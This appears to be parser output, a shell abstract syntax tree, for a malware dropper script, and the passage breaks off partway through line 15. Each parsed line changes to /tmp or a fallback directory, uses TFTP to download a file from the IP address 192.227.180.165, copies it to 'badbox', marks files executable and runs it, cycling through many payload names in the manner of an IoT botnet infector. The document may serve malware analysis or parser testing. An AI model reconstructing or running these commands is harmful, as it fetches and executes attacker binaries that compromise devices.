CommandNode(lineno=2, pos=(12, 26), parts=[
  WordNode(lineno=2, pos=(12, 18), word='ulimit'),
  WordNode(lineno=2, pos=(19, 21), word='-n'),
  WordNode(lineno=2, pos=(22, 26), word='1024'),
])
CommandNode(lineno=3, pos=(27, 48), parts=[
  WordNode(lineno=3, pos=(27, 29), word='cp'),
  WordNode(lineno=3, pos=(30, 42), word='/bin/busybox'),
  WordNode(lineno=3, pos=(43, 48), word='/tmp/'),
])
ListNode(lineno=4, pos=(49, 179), parts=[
  CommandNode(lineno=4, pos=(49, 56), parts=[
    WordNode(lineno=4, pos=(49, 51), word='cd'),
    WordNode(lineno=4, pos=(52, 56), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(57, 59)),
  CommandNode(lineno=4, pos=(60, 71), parts=[
    WordNode(lineno=4, pos=(60, 62), word='cd'),
    WordNode(lineno=4, pos=(63, 71), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(72, 74)),
  CommandNode(lineno=4, pos=(75, 82), parts=[
    WordNode(lineno=4, pos=(75, 77), word='cd'),
    WordNode(lineno=4, pos=(78, 82), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(83, 85)),
  CommandNode(lineno=4, pos=(86, 94), parts=[
    WordNode(lineno=4, pos=(86, 88), word='cd'),
    WordNode(lineno=4, pos=(89, 94), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(95, 97)),
  CommandNode(lineno=4, pos=(98, 102), parts=[
    WordNode(lineno=4, pos=(98, 100), word='cd'),
    WordNode(lineno=4, pos=(101, 102), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(102, 103)),
  CommandNode(lineno=4, pos=(104, 139), parts=[
    WordNode(lineno=4, pos=(104, 108), word='tftp'),
    WordNode(lineno=4, pos=(109, 124), word='192.227.180.165'),
    WordNode(lineno=4, pos=(125, 127), word='-c'),
    WordNode(lineno=4, pos=(128, 131), word='get'),
    WordNode(lineno=4, pos=(132, 139), word='vgsfdag'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(139, 140)),
  CommandNode(lineno=4, pos=(140, 159), parts=[
    WordNode(lineno=4, pos=(140, 143), word='cat'),
    WordNode(lineno=4, pos=(144, 151), word='vgsfdag'),
    RedirectNode(lineno=4, output=
      WordNode(lineno=4, pos=(153, 159), word='badbox'), pos=(152, 159), type='>'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(159, 160)),
  CommandNode(lineno=4, pos=(160, 170), parts=[
    WordNode(lineno=4, pos=(160, 165), word='chmod'),
    WordNode(lineno=4, pos=(166, 168), word='+x'),
    WordNode(lineno=4, pos=(169, 170), word='*'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(170, 171)),
  CommandNode(lineno=4, pos=(171, 179), parts=[
    WordNode(lineno=4, pos=(171, 179), word='./badbox'),
  ]),
])
ListNode(lineno=5, pos=(180, 304), parts=[
  CommandNode(lineno=5, pos=(180, 187), parts=[
    WordNode(lineno=5, pos=(180, 182), word='cd'),
    WordNode(lineno=5, pos=(183, 187), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(188, 190)),
  CommandNode(lineno=5, pos=(191, 202), parts=[
    WordNode(lineno=5, pos=(191, 193), word='cd'),
    WordNode(lineno=5, pos=(194, 202), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(203, 205)),
  CommandNode(lineno=5, pos=(206, 213), parts=[
    WordNode(lineno=5, pos=(206, 208), word='cd'),
    WordNode(lineno=5, pos=(209, 213), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(214, 216)),
  CommandNode(lineno=5, pos=(217, 225), parts=[
    WordNode(lineno=5, pos=(217, 219), word='cd'),
    WordNode(lineno=5, pos=(220, 225), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(226, 228)),
  CommandNode(lineno=5, pos=(229, 233), parts=[
    WordNode(lineno=5, pos=(229, 231), word='cd'),
    WordNode(lineno=5, pos=(232, 233), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(233, 234)),
  CommandNode(lineno=5, pos=(235, 267), parts=[
    WordNode(lineno=5, pos=(235, 239), word='tftp'),
    WordNode(lineno=5, pos=(240, 255), word='192.227.180.165'),
    WordNode(lineno=5, pos=(256, 258), word='-c'),
    WordNode(lineno=5, pos=(259, 262), word='get'),
    WordNode(lineno=5, pos=(263, 267), word='fdsg'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(267, 268)),
  CommandNode(lineno=5, pos=(268, 284), parts=[
    WordNode(lineno=5, pos=(268, 271), word='cat'),
    WordNode(lineno=5, pos=(272, 276), word='fdsg'),
    RedirectNode(lineno=5, output=
      WordNode(lineno=5, pos=(278, 284), word='badbox'), pos=(277, 284), type='>'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(284, 285)),
  CommandNode(lineno=5, pos=(285, 295), parts=[
    WordNode(lineno=5, pos=(285, 290), word='chmod'),
    WordNode(lineno=5, pos=(291, 293), word='+x'),
    WordNode(lineno=5, pos=(294, 295), word='*'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(295, 296)),
  CommandNode(lineno=5, pos=(296, 304), parts=[
    WordNode(lineno=5, pos=(296, 304), word='./badbox'),
  ]),
])
ListNode(lineno=6, pos=(305, 427), parts=[
  CommandNode(lineno=6, pos=(305, 312), parts=[
    WordNode(lineno=6, pos=(305, 307), word='cd'),
    WordNode(lineno=6, pos=(308, 312), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(313, 315)),
  CommandNode(lineno=6, pos=(316, 327), parts=[
    WordNode(lineno=6, pos=(316, 318), word='cd'),
    WordNode(lineno=6, pos=(319, 327), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(328, 330)),
  CommandNode(lineno=6, pos=(331, 338), parts=[
    WordNode(lineno=6, pos=(331, 333), word='cd'),
    WordNode(lineno=6, pos=(334, 338), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(339, 341)),
  CommandNode(lineno=6, pos=(342, 350), parts=[
    WordNode(lineno=6, pos=(342, 344), word='cd'),
    WordNode(lineno=6, pos=(345, 350), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(351, 353)),
  CommandNode(lineno=6, pos=(354, 358), parts=[
    WordNode(lineno=6, pos=(354, 356), word='cd'),
    WordNode(lineno=6, pos=(357, 358), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(358, 359)),
  CommandNode(lineno=6, pos=(360, 391), parts=[
    WordNode(lineno=6, pos=(360, 364), word='tftp'),
    WordNode(lineno=6, pos=(365, 380), word='192.227.180.165'),
    WordNode(lineno=6, pos=(381, 383), word='-c'),
    WordNode(lineno=6, pos=(384, 387), word='get'),
    WordNode(lineno=6, pos=(388, 391), word='sgf'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(391, 392)),
  CommandNode(lineno=6, pos=(392, 407), parts=[
    WordNode(lineno=6, pos=(392, 395), word='cat'),
    WordNode(lineno=6, pos=(396, 399), word='sgf'),
    RedirectNode(lineno=6, output=
      WordNode(lineno=6, pos=(401, 407), word='badbox'), pos=(400, 407), type='>'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(407, 408)),
  CommandNode(lineno=6, pos=(408, 418), parts=[
    WordNode(lineno=6, pos=(408, 413), word='chmod'),
    WordNode(lineno=6, pos=(414, 416), word='+x'),
    WordNode(lineno=6, pos=(417, 418), word='*'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(418, 419)),
  CommandNode(lineno=6, pos=(419, 427), parts=[
    WordNode(lineno=6, pos=(419, 427), word='./badbox'),
  ]),
])
ListNode(lineno=7, pos=(428, 550), parts=[
  CommandNode(lineno=7, pos=(428, 435), parts=[
    WordNode(lineno=7, pos=(428, 430), word='cd'),
    WordNode(lineno=7, pos=(431, 435), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(436, 438)),
  CommandNode(lineno=7, pos=(439, 450), parts=[
    WordNode(lineno=7, pos=(439, 441), word='cd'),
    WordNode(lineno=7, pos=(442, 450), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(451, 453)),
  CommandNode(lineno=7, pos=(454, 461), parts=[
    WordNode(lineno=7, pos=(454, 456), word='cd'),
    WordNode(lineno=7, pos=(457, 461), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(462, 464)),
  CommandNode(lineno=7, pos=(465, 473), parts=[
    WordNode(lineno=7, pos=(465, 467), word='cd'),
    WordNode(lineno=7, pos=(468, 473), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(474, 476)),
  CommandNode(lineno=7, pos=(477, 481), parts=[
    WordNode(lineno=7, pos=(477, 479), word='cd'),
    WordNode(lineno=7, pos=(480, 481), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(481, 482)),
  CommandNode(lineno=7, pos=(483, 514), parts=[
    WordNode(lineno=7, pos=(483, 487), word='tftp'),
    WordNode(lineno=7, pos=(488, 503), word='192.227.180.165'),
    WordNode(lineno=7, pos=(504, 506), word='-c'),
    WordNode(lineno=7, pos=(507, 510), word='get'),
    WordNode(lineno=7, pos=(511, 514), word='sfg'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(514, 515)),
  CommandNode(lineno=7, pos=(515, 530), parts=[
    WordNode(lineno=7, pos=(515, 518), word='cat'),
    WordNode(lineno=7, pos=(519, 522), word='sfg'),
    RedirectNode(lineno=7, output=
      WordNode(lineno=7, pos=(524, 530), word='badbox'), pos=(523, 530), type='>'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(530, 531)),
  CommandNode(lineno=7, pos=(531, 541), parts=[
    WordNode(lineno=7, pos=(531, 536), word='chmod'),
    WordNode(lineno=7, pos=(537, 539), word='+x'),
    WordNode(lineno=7, pos=(540, 541), word='*'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(541, 542)),
  CommandNode(lineno=7, pos=(542, 550), parts=[
    WordNode(lineno=7, pos=(542, 550), word='./badbox'),
  ]),
])
ListNode(lineno=8, pos=(551, 673), parts=[
  CommandNode(lineno=8, pos=(551, 558), parts=[
    WordNode(lineno=8, pos=(551, 553), word='cd'),
    WordNode(lineno=8, pos=(554, 558), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(559, 561)),
  CommandNode(lineno=8, pos=(562, 573), parts=[
    WordNode(lineno=8, pos=(562, 564), word='cd'),
    WordNode(lineno=8, pos=(565, 573), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(574, 576)),
  CommandNode(lineno=8, pos=(577, 584), parts=[
    WordNode(lineno=8, pos=(577, 579), word='cd'),
    WordNode(lineno=8, pos=(580, 584), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(585, 587)),
  CommandNode(lineno=8, pos=(588, 596), parts=[
    WordNode(lineno=8, pos=(588, 590), word='cd'),
    WordNode(lineno=8, pos=(591, 596), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(597, 599)),
  CommandNode(lineno=8, pos=(600, 604), parts=[
    WordNode(lineno=8, pos=(600, 602), word='cd'),
    WordNode(lineno=8, pos=(603, 604), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(604, 605)),
  CommandNode(lineno=8, pos=(606, 637), parts=[
    WordNode(lineno=8, pos=(606, 610), word='tftp'),
    WordNode(lineno=8, pos=(611, 626), word='192.227.180.165'),
    WordNode(lineno=8, pos=(627, 629), word='-c'),
    WordNode(lineno=8, pos=(630, 633), word='get'),
    WordNode(lineno=8, pos=(634, 637), word='sgf'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(637, 638)),
  CommandNode(lineno=8, pos=(638, 653), parts=[
    WordNode(lineno=8, pos=(638, 641), word='cat'),
    WordNode(lineno=8, pos=(642, 645), word='sgf'),
    RedirectNode(lineno=8, output=
      WordNode(lineno=8, pos=(647, 653), word='badbox'), pos=(646, 653), type='>'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(653, 654)),
  CommandNode(lineno=8, pos=(654, 664), parts=[
    WordNode(lineno=8, pos=(654, 659), word='chmod'),
    WordNode(lineno=8, pos=(660, 662), word='+x'),
    WordNode(lineno=8, pos=(663, 664), word='*'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(664, 665)),
  CommandNode(lineno=8, pos=(665, 673), parts=[
    WordNode(lineno=8, pos=(665, 673), word='./badbox'),
  ]),
])
ListNode(lineno=9, pos=(674, 798), parts=[
  CommandNode(lineno=9, pos=(674, 681), parts=[
    WordNode(lineno=9, pos=(674, 676), word='cd'),
    WordNode(lineno=9, pos=(677, 681), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(682, 684)),
  CommandNode(lineno=9, pos=(685, 696), parts=[
    WordNode(lineno=9, pos=(685, 687), word='cd'),
    WordNode(lineno=9, pos=(688, 696), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(697, 699)),
  CommandNode(lineno=9, pos=(700, 707), parts=[
    WordNode(lineno=9, pos=(700, 702), word='cd'),
    WordNode(lineno=9, pos=(703, 707), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(708, 710)),
  CommandNode(lineno=9, pos=(711, 719), parts=[
    WordNode(lineno=9, pos=(711, 713), word='cd'),
    WordNode(lineno=9, pos=(714, 719), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(720, 722)),
  CommandNode(lineno=9, pos=(723, 727), parts=[
    WordNode(lineno=9, pos=(723, 725), word='cd'),
    WordNode(lineno=9, pos=(726, 727), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(727, 728)),
  CommandNode(lineno=9, pos=(729, 761), parts=[
    WordNode(lineno=9, pos=(729, 733), word='tftp'),
    WordNode(lineno=9, pos=(734, 749), word='192.227.180.165'),
    WordNode(lineno=9, pos=(750, 752), word='-c'),
    WordNode(lineno=9, pos=(753, 756), word='get'),
    WordNode(lineno=9, pos=(757, 761), word='sdfg'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(761, 762)),
  CommandNode(lineno=9, pos=(762, 778), parts=[
    WordNode(lineno=9, pos=(762, 765), word='cat'),
    WordNode(lineno=9, pos=(766, 770), word='sdfg'),
    RedirectNode(lineno=9, output=
      WordNode(lineno=9, pos=(772, 778), word='badbox'), pos=(771, 778), type='>'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(778, 779)),
  CommandNode(lineno=9, pos=(779, 789), parts=[
    WordNode(lineno=9, pos=(779, 784), word='chmod'),
    WordNode(lineno=9, pos=(785, 787), word='+x'),
    WordNode(lineno=9, pos=(788, 789), word='*'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(789, 790)),
  CommandNode(lineno=9, pos=(790, 798), parts=[
    WordNode(lineno=9, pos=(790, 798), word='./badbox'),
  ]),
])
ListNode(lineno=10, pos=(799, 921), parts=[
  CommandNode(lineno=10, pos=(799, 806), parts=[
    WordNode(lineno=10, pos=(799, 801), word='cd'),
    WordNode(lineno=10, pos=(802, 806), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(807, 809)),
  CommandNode(lineno=10, pos=(810, 821), parts=[
    WordNode(lineno=10, pos=(810, 812), word='cd'),
    WordNode(lineno=10, pos=(813, 821), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(822, 824)),
  CommandNode(lineno=10, pos=(825, 832), parts=[
    WordNode(lineno=10, pos=(825, 827), word='cd'),
    WordNode(lineno=10, pos=(828, 832), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(833, 835)),
  CommandNode(lineno=10, pos=(836, 844), parts=[
    WordNode(lineno=10, pos=(836, 838), word='cd'),
    WordNode(lineno=10, pos=(839, 844), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(845, 847)),
  CommandNode(lineno=10, pos=(848, 852), parts=[
    WordNode(lineno=10, pos=(848, 850), word='cd'),
    WordNode(lineno=10, pos=(851, 852), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(852, 853)),
  CommandNode(lineno=10, pos=(854, 885), parts=[
    WordNode(lineno=10, pos=(854, 858), word='tftp'),
    WordNode(lineno=10, pos=(859, 874), word='192.227.180.165'),
    WordNode(lineno=10, pos=(875, 877), word='-c'),
    WordNode(lineno=10, pos=(878, 881), word='get'),
    WordNode(lineno=10, pos=(882, 885), word='sdf'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(885, 886)),
  CommandNode(lineno=10, pos=(886, 901), parts=[
    WordNode(lineno=10, pos=(886, 889), word='cat'),
    WordNode(lineno=10, pos=(890, 893), word='sdf'),
    RedirectNode(lineno=10, output=
      WordNode(lineno=10, pos=(895, 901), word='badbox'), pos=(894, 901), type='>'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(901, 902)),
  CommandNode(lineno=10, pos=(902, 912), parts=[
    WordNode(lineno=10, pos=(902, 907), word='chmod'),
    WordNode(lineno=10, pos=(908, 910), word='+x'),
    WordNode(lineno=10, pos=(911, 912), word='*'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(912, 913)),
  CommandNode(lineno=10, pos=(913, 921), parts=[
    WordNode(lineno=10, pos=(913, 921), word='./badbox'),
  ]),
])
ListNode(lineno=11, pos=(922, 1046), parts=[
  CommandNode(lineno=11, pos=(922, 929), parts=[
    WordNode(lineno=11, pos=(922, 924), word='cd'),
    WordNode(lineno=11, pos=(925, 929), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(930, 932)),
  CommandNode(lineno=11, pos=(933, 944), parts=[
    WordNode(lineno=11, pos=(933, 935), word='cd'),
    WordNode(lineno=11, pos=(936, 944), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(945, 947)),
  CommandNode(lineno=11, pos=(948, 955), parts=[
    WordNode(lineno=11, pos=(948, 950), word='cd'),
    WordNode(lineno=11, pos=(951, 955), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(956, 958)),
  CommandNode(lineno=11, pos=(959, 967), parts=[
    WordNode(lineno=11, pos=(959, 961), word='cd'),
    WordNode(lineno=11, pos=(962, 967), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(968, 970)),
  CommandNode(lineno=11, pos=(971, 975), parts=[
    WordNode(lineno=11, pos=(971, 973), word='cd'),
    WordNode(lineno=11, pos=(974, 975), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(975, 976)),
  CommandNode(lineno=11, pos=(977, 1009), parts=[
    WordNode(lineno=11, pos=(977, 981), word='tftp'),
    WordNode(lineno=11, pos=(982, 997), word='192.227.180.165'),
    WordNode(lineno=11, pos=(998, 1000), word='-c'),
    WordNode(lineno=11, pos=(1001, 1004), word='get'),
    WordNode(lineno=11, pos=(1005, 1009), word='sgfd'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1009, 1010)),
  CommandNode(lineno=11, pos=(1010, 1026), parts=[
    WordNode(lineno=11, pos=(1010, 1013), word='cat'),
    WordNode(lineno=11, pos=(1014, 1018), word='sgfd'),
    RedirectNode(lineno=11, output=
      WordNode(lineno=11, pos=(1020, 1026), word='badbox'), pos=(1019, 1026), type='>'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1026, 1027)),
  CommandNode(lineno=11, pos=(1027, 1037), parts=[
    WordNode(lineno=11, pos=(1027, 1032), word='chmod'),
    WordNode(lineno=11, pos=(1033, 1035), word='+x'),
    WordNode(lineno=11, pos=(1036, 1037), word='*'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1037, 1038)),
  CommandNode(lineno=11, pos=(1038, 1046), parts=[
    WordNode(lineno=11, pos=(1038, 1046), word='./badbox'),
  ]),
])
ListNode(lineno=12, pos=(1047, 1173), parts=[
  CommandNode(lineno=12, pos=(1047, 1054), parts=[
    WordNode(lineno=12, pos=(1047, 1049), word='cd'),
    WordNode(lineno=12, pos=(1050, 1054), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1055, 1057)),
  CommandNode(lineno=12, pos=(1058, 1069), parts=[
    WordNode(lineno=12, pos=(1058, 1060), word='cd'),
    WordNode(lineno=12, pos=(1061, 1069), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1070, 1072)),
  CommandNode(lineno=12, pos=(1073, 1080), parts=[
    WordNode(lineno=12, pos=(1073, 1075), word='cd'),
    WordNode(lineno=12, pos=(1076, 1080), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1081, 1083)),
  CommandNode(lineno=12, pos=(1084, 1092), parts=[
    WordNode(lineno=12, pos=(1084, 1086), word='cd'),
    WordNode(lineno=12, pos=(1087, 1092), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1093, 1095)),
  CommandNode(lineno=12, pos=(1096, 1100), parts=[
    WordNode(lineno=12, pos=(1096, 1098), word='cd'),
    WordNode(lineno=12, pos=(1099, 1100), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1100, 1101)),
  CommandNode(lineno=12, pos=(1102, 1135), parts=[
    WordNode(lineno=12, pos=(1102, 1106), word='tftp'),
    WordNode(lineno=12, pos=(1107, 1122), word='192.227.180.165'),
    WordNode(lineno=12, pos=(1123, 1125), word='-c'),
    WordNode(lineno=12, pos=(1126, 1129), word='get'),
    WordNode(lineno=12, pos=(1130, 1135), word='fghjd'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1135, 1136)),
  CommandNode(lineno=12, pos=(1136, 1153), parts=[
    WordNode(lineno=12, pos=(1136, 1139), word='cat'),
    WordNode(lineno=12, pos=(1140, 1145), word='fghjd'),
    RedirectNode(lineno=12, output=
      WordNode(lineno=12, pos=(1147, 1153), word='badbox'), pos=(1146, 1153), type='>'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1153, 1154)),
  CommandNode(lineno=12, pos=(1154, 1164), parts=[
    WordNode(lineno=12, pos=(1154, 1159), word='chmod'),
    WordNode(lineno=12, pos=(1160, 1162), word='+x'),
    WordNode(lineno=12, pos=(1163, 1164), word='*'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1164, 1165)),
  CommandNode(lineno=12, pos=(1165, 1173), parts=[
    WordNode(lineno=12, pos=(1165, 1173), word='./badbox'),
  ]),
])
ListNode(lineno=13, pos=(1174, 1310), parts=[
  CommandNode(lineno=13, pos=(1174, 1181), parts=[
    WordNode(lineno=13, pos=(1174, 1176), word='cd'),
    WordNode(lineno=13, pos=(1177, 1181), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1182, 1184)),
  CommandNode(lineno=13, pos=(1185, 1196), parts=[
    WordNode(lineno=13, pos=(1185, 1187), word='cd'),
    WordNode(lineno=13, pos=(1188, 1196), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1197, 1199)),
  CommandNode(lineno=13, pos=(1200, 1207), parts=[
    WordNode(lineno=13, pos=(1200, 1202), word='cd'),
    WordNode(lineno=13, pos=(1203, 1207), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1208, 1210)),
  CommandNode(lineno=13, pos=(1211, 1219), parts=[
    WordNode(lineno=13, pos=(1211, 1213), word='cd'),
    WordNode(lineno=13, pos=(1214, 1219), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1220, 1222)),
  CommandNode(lineno=13, pos=(1223, 1227), parts=[
    WordNode(lineno=13, pos=(1223, 1225), word='cd'),
    WordNode(lineno=13, pos=(1226, 1227), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1227, 1228)),
  CommandNode(lineno=13, pos=(1229, 1267), parts=[
    WordNode(lineno=13, pos=(1229, 1233), word='tftp'),
    WordNode(lineno=13, pos=(1234, 1249), word='192.227.180.165'),
    WordNode(lineno=13, pos=(1250, 1252), word='-c'),
    WordNode(lineno=13, pos=(1253, 1256), word='get'),
    WordNode(lineno=13, pos=(1257, 1267), word='gfjfdjdjfd'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1267, 1268)),
  CommandNode(lineno=13, pos=(1268, 1290), parts=[
    WordNode(lineno=13, pos=(1268, 1271), word='cat'),
    WordNode(lineno=13, pos=(1272, 1282), word='gfjfdjdjfd'),
    RedirectNode(lineno=13, output=
      WordNode(lineno=13, pos=(1284, 1290), word='badbox'), pos=(1283, 1290), type='>'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1290, 1291)),
  CommandNode(lineno=13, pos=(1291, 1301), parts=[
    WordNode(lineno=13, pos=(1291, 1296), word='chmod'),
    WordNode(lineno=13, pos=(1297, 1299), word='+x'),
    WordNode(lineno=13, pos=(1300, 1301), word='*'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1301, 1302)),
  CommandNode(lineno=13, pos=(1302, 1310), parts=[
    WordNode(lineno=13, pos=(1302, 1310), word='./badbox'),
  ]),
])
ListNode(lineno=14, pos=(1311, 1453), parts=[
  CommandNode(lineno=14, pos=(1311, 1318), parts=[
    WordNode(lineno=14, pos=(1311, 1313), word='cd'),
    WordNode(lineno=14, pos=(1314, 1318), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1319, 1321)),
  CommandNode(lineno=14, pos=(1322, 1333), parts=[
    WordNode(lineno=14, pos=(1322, 1324), word='cd'),
    WordNode(lineno=14, pos=(1325, 1333), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1334, 1336)),
  CommandNode(lineno=14, pos=(1337, 1344), parts=[
    WordNode(lineno=14, pos=(1337, 1339), word='cd'),
    WordNode(lineno=14, pos=(1340, 1344), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1345, 1347)),
  CommandNode(lineno=14, pos=(1348, 1356), parts=[
    WordNode(lineno=14, pos=(1348, 1350), word='cd'),
    WordNode(lineno=14, pos=(1351, 1356), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1357, 1359)),
  CommandNode(lineno=14, pos=(1360, 1364), parts=[
    WordNode(lineno=14, pos=(1360, 1362), word='cd'),
    WordNode(lineno=14, pos=(1363, 1364), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1364, 1365)),
  CommandNode(lineno=14, pos=(1366, 1407), parts=[
    WordNode(lineno=14, pos=(1366, 1370), word='tftp'),
    WordNode(lineno=14, pos=(1371, 1386), word='192.227.180.165'),
    WordNode(lineno=14, pos=(1387, 1389), word='-c'),
    WordNode(lineno=14, pos=(1390, 1393), word='get'),
    WordNode(lineno=14, pos=(1394, 1407), word='[dfjdfjgfdjf]'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1407, 1408)),
  CommandNode(lineno=14, pos=(1408, 1433), parts=[
    WordNode(lineno=14, pos=(1408, 1411), word='cat'),
    WordNode(lineno=14, pos=(1412, 1425), word='[dfjdfjgfdjf]'),
    RedirectNode(lineno=14, output=
      WordNode(lineno=14, pos=(1427, 1433), word='badbox'), pos=(1426, 1433), type='>'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1433, 1434)),
  CommandNode(lineno=14, pos=(1434, 1444), parts=[
    WordNode(lineno=14, pos=(1434, 1439), word='chmod'),
    WordNode(lineno=14, pos=(1440, 1442), word='+x'),
    WordNode(lineno=14, pos=(1443, 1444), word='*'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1444, 1445)),
  CommandNode(lineno=14, pos=(1445, 1453), parts=[
    WordNode(lineno=14, pos=(1445, 1453), word='./badbox'),
  ]),
])
ListNode(lineno=15, pos=(1454, 1586), parts=[
  CommandNode(lineno=15, pos=(1454, 1461), parts=[
    WordNode(lineno=15, pos=(1454, 1456), word='cd'),
    WordNode(lineno=15, pos=(1457, 1461), word='/tmp'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1462, 1464)),
  CommandNode(lineno=15, pos=(1465, 1476), parts=[
    WordNode(lineno=15, pos=(1465, 1467), word='cd'),
    WordNode(lineno=15, pos=(1468, 1476), word='/var/run'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1477, 1479)),
  CommandNode(lineno=15, pos=(1480, 1487), parts=[
    WordNode(lineno=15, pos=(1480, 1482), word='cd'),
    WordNode(lineno=15, pos=(1483, 1487), word='/mnt'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1488, 1490)),
  CommandNode(lineno=15, pos=(1491, 1499), parts=[
    WordNode(lineno=15, pos=(1491, 1493), word='cd'),
    WordNode(lineno=15, pos=(1494, 1499), word='/root'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1500, 1502)),
  CommandNode(lineno=15, pos=(1503, 1507), parts=[
    WordNode(lineno=15, pos=(1503, 1505), word='cd'),
    WordNode(lineno=15, pos=(1506, 1507), word='/'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1507, 1508)),
  CommandNode(lineno=15, pos=(1509, 1545), parts=[
    WordNode(lineno=15, pos=(1509, 1513), word='tftp'),
    WordNode(lineno=15, pos=(1514, 1529), word='192.227.180.165'),
    WordNode(lineno=15, pos=(1530, 1532), word='-c'),
    WordNode(lineno=15, pos=(1533, 1536), word='get'),
    WordNode(lineno=15, pos=(1537, 1545), word='fjdfdfdj'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1545, 1546)),
  CommandNode(lineno=15, pos=(1546, 1566), parts=[
    WordNode(lineno=15, pos=(1546, 1549), word='cat'),
    WordNode(lineno=15, pos=(1550, 1558), word='fjdfdfdj'),
    RedirectNode(lineno=15, output=
      WordNode(lineno=15, pos=(1560, 1566), word='badbox'), pos=(1559, 1566), type='>'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1566, 1567)),
  CommandNode(lineno=15, pos=(1567, 1577), parts=[
    WordNode(lineno=15, pos=(1567, 1572), word='chmod'),
